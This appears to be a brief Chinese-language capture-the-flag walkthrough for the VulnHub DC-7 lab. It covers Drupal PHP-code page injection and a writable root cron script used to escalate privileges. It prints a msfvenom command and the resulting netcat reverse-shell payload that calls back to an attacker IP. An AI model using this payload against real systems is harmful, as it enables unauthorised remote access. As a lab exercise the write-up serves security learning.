靶機下載地址:
https://www.vulnhub.com/entry/dc-7,356/
主機掃描:
http://10.10.202.161/
Google搜索下:
SSH 登錄
以上分析得出:此腳本是root每三分鍾執行一次,並且www-data用戶具有寫入權限,因此需要想辦法獲取此權限,進行寫入shell反彈即可
https://www.digitalocean.com/community/tutorials/a-beginner-s-guide-to-drush-the-drupal-shel
我們點擊擴展安裝一個PHP的模塊
https://www.drupal.org/project/php
創建基本網頁,選擇PHP code
寫入shell
本地監聽獲取shell root權限
等了三分鍾沒shell過來,竟然沒執行,這。。。。 換個方式吧
╰─ msfvenom -p cmd/unix/reverse_netcat lhost=10.10.202.159 lport=6666 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
mkfifo /tmp/iwxe; nc 10.10.202.159 6666 0</tmp/iwxe | /bin/sh >/tmp/iwxe 2>&1; rm /tmp/iwxe
確認已經寫入
OVER !